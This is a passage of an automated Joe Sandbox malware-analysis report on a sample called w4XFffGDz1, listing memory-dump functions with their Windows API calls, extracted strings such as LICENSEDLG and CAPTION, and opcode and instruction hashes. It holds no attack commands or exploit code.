                        • Opcode Fuzzy Hash: e4a83813c1d231c1dff236a8c6d20c4c2446dbafe787cacd3a7110b4a3606fd0
                        • Instruction Fuzzy Hash: 34D158745082C19FC704CF59E8D086ABBF0AB9A304F098A5EF5D597792C331EA56CBB1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1ecc006279f16d3e85f1f07f6f761ebfed9f7365b7a43a4ef2d669a8af9c0a46
                        • Instruction ID: f6f6c6290f67701d38b7016e03a091104e45bfee21a799e8fd2738d874c6759c
                        • Opcode Fuzzy Hash: 1ecc006279f16d3e85f1f07f6f761ebfed9f7365b7a43a4ef2d669a8af9c0a46
                        • Instruction Fuzzy Hash: 43617B71B4032976DE3C9A284855BFE23D8FB52748F24091AE883DF281D735EE86C355
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                        • Instruction ID: c3cbe40f10f377f746bdb45489f33b0d09a1f2dc28d509bae32085034a281da3
                        • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                        • Instruction Fuzzy Hash: 41519E7060174477EF3C9DAC84657FF27D99B26300F190A1ADC82E7A82DB35EE458762
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e0d1aed2d6ba4704f4e3cbb88a3e7ab26818e347d4022e8e0030761a2aae800e
                        • Instruction ID: 4c3818beb765da2b109c11f802dfec9e44f4afa285484f9d71ab8a541d7dbdba
                        • Opcode Fuzzy Hash: e0d1aed2d6ba4704f4e3cbb88a3e7ab26818e347d4022e8e0030761a2aae800e
                        • Instruction Fuzzy Hash: B251E4316483954FC711DF28854846EBFF0AEDA324F5A899AE4D94B142D730EB4ACB62
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7390a92b67c97bb6386d99c391e49f1c7c7cf1a0797bcbd692ebf4bf6df5b084
                        • Instruction ID: 0f1fe4370970689a8aa3f1849c8ee5626bb0b35345fa7e0f330ced251e7c0556
                        • Opcode Fuzzy Hash: 7390a92b67c97bb6386d99c391e49f1c7c7cf1a0797bcbd692ebf4bf6df5b084
                        • Instruction Fuzzy Hash: D7410A70501711CFC71ADF34D5559A6B7F0FF5A700B1288AFE46A8B261EB30E608DB59
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: 40cd6d811253d6926dd092237c57edabd56706736929246b0a85fa15271114ad
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: 0511387724109183D614EA2DD8B45B6A3D5EBC5321B2D837AC04ECB754D3239B44DF00
                        APIs
                        • _swprintf.LIBCMT ref: 00177B9C
                          • Part of subcall function 00174C1E: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00174C31
                          • Part of subcall function 0017BBC8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00177BB8,?,00000000,00000000,?,?,?,00177BB8,?,?,00000050), ref: 0017BBE5
                        • SetDlgItemTextW.USER32(?,001AE16C,?), ref: 00177C16
                        • GetWindowRect.USER32(?,?), ref: 00177C4C
                        • GetClientRect.USER32(?,?), ref: 00177C58
                        • GetWindowLongW.USER32(?,000000F0), ref: 00177D03
                        • GetWindowRect.USER32(?,?), ref: 00177D33
                        • SetWindowTextW.USER32(?,?), ref: 00177D62
                        • GetSystemMetrics.USER32(00000008), ref: 00177D6A
                        • GetWindow.USER32(?,00000005), ref: 00177D75
                        • GetWindowRect.USER32(00000000,?), ref: 00177DA5
                        • GetWindow.USER32(00000000,00000002), ref: 00177E17
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_swprintf
                        • String ID: $%s:$CAPTION$d
                        • API String ID: 3208934588-2512411981
                        • Opcode ID: 7b005629bb5291168df2e57ea62f74f6208bfb6b8c3286b7619ffc214f993428
                        • Instruction ID: efe02685b67330a18e6e906b00aef15085964cbc8132109973c83dff49e0d4f2
                        • Opcode Fuzzy Hash: 7b005629bb5291168df2e57ea62f74f6208bfb6b8c3286b7619ffc214f993428
                        • Instruction Fuzzy Hash: CB818BB2508301AFD714DF68CD89E6FBBF9EB88714F04491DF98993291D730E8498B92
                        APIs
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(001CB878,00000FA0,?,?,0018CBC5), ref: 0018CBF3
                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0018CBC5), ref: 0018CBFE
                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0018CBC5), ref: 0018CC0F
                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0018CC21
                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0018CC2F
                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0018CBC5), ref: 0018CC52
                        • DeleteCriticalSection.KERNEL32(001CB878,00000007,?,?,0018CBC5), ref: 0018CC75
                        • CloseHandle.KERNEL32(00000000,?,?,0018CBC5), ref: 0018CC85
                        Strings
                        • kernel32.dll, xrefs: 0018CC0A
                        • WakeAllConditionVariable, xrefs: 0018CC27
                        • SleepConditionVariableCS, xrefs: 0018CC1B
                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0018CBF9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                        • API String ID: 2565136772-3242537097
                        • Opcode ID: d4002e638889542ba69431dd2f935080ebfbe163743708c936a399c4fd122b01
                        • Instruction ID: 6a39d69dad0b37e591f1fe6616d03503b7a70e90c9ad9431f696aa0b8f9f9a3e
                        • Opcode Fuzzy Hash: d4002e638889542ba69431dd2f935080ebfbe163743708c936a399c4fd122b01
                        • Instruction Fuzzy Hash: 11018475A44A11ABDB212B79BD8AE277EACDB97B41F050115FD0DE3950DBB0C880CBB4
                        APIs
                        • ___free_lconv_mon.LIBCMT ref: 00199F06
                          • Part of subcall function 00199AA1: _free.LIBCMT ref: 00199ABE
                          • Part of subcall function 00199AA1: _free.LIBCMT ref: 00199AD0
                          • Part of subcall function 00199AA1: _free.LIBCMT ref: 00199AE2
                          • Part of subcall function 00199AA1: _free.LIBCMT ref: 00199AF4
                          • Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B06
                          • Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B18
                          • Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B2A
                          • Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B3C
                          • Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B4E
                          • Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B60
                          • Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B72
                          • Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B84
                          • Part of subcall function 00199AA1: _free.LIBCMT ref: 00199B96
                        • _free.LIBCMT ref: 00199EFB
                          • Part of subcall function 00196B34: RtlFreeHeap.NTDLL(00000000,00000000,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?), ref: 00196B4A
                          • Part of subcall function 00196B34: GetLastError.KERNEL32(?,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?,?), ref: 00196B5C
                        • _free.LIBCMT ref: 00199F1D
                        • _free.LIBCMT ref: 00199F32
                        • _free.LIBCMT ref: 00199F3D
                        • _free.LIBCMT ref: 00199F5F
                        • _free.LIBCMT ref: 00199F72
                        • _free.LIBCMT ref: 00199F80
                        • _free.LIBCMT ref: 00199F8B
                        • _free.LIBCMT ref: 00199FC3
                        • _free.LIBCMT ref: 00199FCA
                        • _free.LIBCMT ref: 00199FE7
                        • _free.LIBCMT ref: 00199FFF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                        • String ID:
                        • API String ID: 161543041-0
                        • Opcode ID: 02487f09a1b218c70e858891bb58f21064c49f55a89edc5437cc8f0b5b11f9dc
                        • Instruction ID: 7cf8816d36138c3b320891bb8a48f766537fce90005927793d978d77d3ca480c
                        • Opcode Fuzzy Hash: 02487f09a1b218c70e858891bb58f21064c49f55a89edc5437cc8f0b5b11f9dc
                        • Instruction Fuzzy Hash: 263105327066059FEF21AB7DD845F5ABBE9AF20310F14446DF85AD7191EB75AC80CB20
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 001849E9
                          • Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4
                        • _wcslen.LIBCMT ref: 00184A4B
                        • _wcslen.LIBCMT ref: 00184A6A
                        • _wcslen.LIBCMT ref: 00184A86
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,001A34A8,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 00184AFD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: _wcslen$AllocGlobalH_prolog3_
                        • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                        • API String ID: 1478282658-1533471033
                        • Opcode ID: 27e5fa315d4d7f7af51c6d89ced9f7620dac960a39eb24f64cbb937eeabdc338
                        • Instruction ID: 967c09f3969b529bf6d8b32e57429edc43820b2b084281dc74d49227651fadc2
                        • Opcode Fuzzy Hash: 27e5fa315d4d7f7af51c6d89ced9f7620dac960a39eb24f64cbb937eeabdc338
                        • Instruction Fuzzy Hash: 54516D75A00219AFEB05EBA4CC46BEEBBB9EF65310F144019F505BB181DB709E85CBA4
                        APIs
                        • GetWindow.USER32(?,00000005), ref: 0018A724
                        • GetClassNameW.USER32(00000000,?,00000080), ref: 0018A750
                          • Part of subcall function 0017BF3C: CompareStringW.KERNEL32(00000400,00001001,B19080A7,000000FF,?,000000FF,001753ED,0000002E,-00000002,00000000,?,00000000,?,00000008,?,?), ref: 0017BF52
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0018A76C
                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0018A783
                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0018A797
                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0018A7C0
                        • DeleteObject.GDI32(00000000), ref: 0018A7C7
                        • GetWindow.USER32(00000000,00000002), ref: 0018A7D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                        • String ID: STATIC
                        • API String ID: 3820355801-1882779555
                        • Opcode ID: 509033bcec73005a5e280b50c48b6ad5fce57a92e6e30c222d42b839f3ee1613
                        • Instruction ID: 3698aff7c537d350253b4f854ae514da6fb19cdcc23019c9f0a9f16e8598ef7a
                        • Opcode Fuzzy Hash: 509033bcec73005a5e280b50c48b6ad5fce57a92e6e30c222d42b839f3ee1613
                        • Instruction Fuzzy Hash: 86213772140714AFF3207B60CC4AFAF7BADAF69B00F440016FA05A6192DB358E014BE2
                        APIs
                        • _free.LIBCMT ref: 00196685
                          • Part of subcall function 00196B34: RtlFreeHeap.NTDLL(00000000,00000000,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?), ref: 00196B4A
                          • Part of subcall function 00196B34: GetLastError.KERNEL32(?,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?,?), ref: 00196B5C
                        • _free.LIBCMT ref: 00196691
                        • _free.LIBCMT ref: 0019669C
                        • _free.LIBCMT ref: 001966A7
                        • _free.LIBCMT ref: 001966B2
                        • _free.LIBCMT ref: 001966BD
                        • _free.LIBCMT ref: 001966C8
                        • _free.LIBCMT ref: 001966D3
                        • _free.LIBCMT ref: 001966DE
                        • _free.LIBCMT ref: 001966EC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: ef0d0712ac6b750d57bccfe18aba5e2f6d97136b812448b1777aa5d83e3fee6e
                        • Instruction ID: 01ef7d9f71feb16bcea5b7207b93e704e7e6c6b8e34e3b7ac83a4433943a1947
                        • Opcode Fuzzy Hash: ef0d0712ac6b750d57bccfe18aba5e2f6d97136b812448b1777aa5d83e3fee6e
                        • Instruction Fuzzy Hash: FD118676712148BFCF01EF54C942CD93BA5EF14350B9141A5BA098F222EB32DE51DFA0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                        • String ID: csm$csm$csm
                        • API String ID: 322700389-393685449
                        • Opcode ID: a8690662c0b474b51d44f137cda4dd29b88c1addd881e67624602f76079ef28a
                        • Instruction ID: d8e4d6bd11d4917cd58d2da3c8b6b68aaaecd7335adeb043ac562d02e9d31ace
                        • Opcode Fuzzy Hash: a8690662c0b474b51d44f137cda4dd29b88c1addd881e67624602f76079ef28a
                        • Instruction Fuzzy Hash: 84B16D71800209EFDF16DFA4C8819AEBBB5FF68310F15416AF915AB212D731EA61CF91
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: H_prolog3_wcslen
                        • String ID: $</p>$</style>$<br>$<style>
                        • API String ID: 3746244732-3393513139
                        • Opcode ID: b3ca2a23bbcc7a085325bf1f2f14b22af1ba429b05bb78d298cf3cfee3c31e04
                        • Instruction ID: 0e44d9f034692c161001d2b96b439b01033a20beb8aec390f3aedf29f4760e94
                        • Opcode Fuzzy Hash: b3ca2a23bbcc7a085325bf1f2f14b22af1ba429b05bb78d298cf3cfee3c31e04
                        • Instruction Fuzzy Hash: 8F513829B40B12D6DF34BA1488617BA73B3EF25751FA44019FCC5AB280EF659F81CB90
                        APIs
                          • Part of subcall function 00171B78: GetDlgItem.USER32(00000000,00003021), ref: 00171BBC
                          • Part of subcall function 00171B78: SetWindowTextW.USER32(00000000,001A2668), ref: 00171BD2
                        • EndDialog.USER32(?,00000001), ref: 00187680
                        • SendMessageW.USER32(?,00000080,00000001,00030479), ref: 001876A7
                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,00050EC9), ref: 001876C0
                        • GetDlgItem.USER32(?,00000065), ref: 001876DC
                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 001876F0
                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00187706
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: MessageSend$Item$DialogTextWindow
                        • String ID: LICENSEDLG
                        • API String ID: 3077722735-2177901306
                        • Opcode ID: ee922ad9f485e1545350fc5b692cc49ed3e96e9338f88d195ee0cc7274288dac
                        • Instruction ID: efef5f54424b89bf52649e975c5235b92c1ffc44ec1f9049f6f8e0cd1da3a0a2
                        • Opcode Fuzzy Hash: ee922ad9f485e1545350fc5b692cc49ed3e96e9338f88d195ee0cc7274288dac
                        • Instruction Fuzzy Hash: CE210631648604BFE2116F2ADC0DE7B3F6CEB67785F254404F204925E1D762DE818BB5
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 001758DB
                        • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00175910
                        • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 0017594F
                        • _wcslen.LIBCMT ref: 0017595F
                        • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 001759DC
                        • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00175A1E
                        • _wcslen.LIBCMT ref: 00175A2E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: FullNamePath$_wcslen$H_prolog3_
                        • String ID:
                        • API String ID: 840513527-0
                        • Opcode ID: e601fcc26aace754919f77732a58cb19b905f2c1e13f258d799a201befe59907
                        • Instruction ID: e2b4a22519a01e0a3ae194d183202ffb62cb770b6cfd5f6fa8d4769e79c8eff3
                        • Opcode Fuzzy Hash: e601fcc26aace754919f77732a58cb19b905f2c1e13f258d799a201befe59907
                        • Instruction Fuzzy Hash: 5E616E71E00609ABDF14DFA8D985AEEB7BAAF98710F14821AF419F7251DB74D940CB20
                        APIs
                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0019D107,?,00000000,?,00000000,00000000), ref: 0019C9D4
                        • __fassign.LIBCMT ref: 0019CA4F
                        • __fassign.LIBCMT ref: 0019CA6A
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0019CA90
                        • WriteFile.KERNEL32(?,?,00000000,0019D107,00000000,?,?,?,?,?,?,?,?,?,0019D107,?), ref: 0019CAAF
                        • WriteFile.KERNEL32(?,?,00000001,0019D107,00000000,?,?,?,?,?,?,?,?,?,0019D107,?), ref: 0019CAE8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
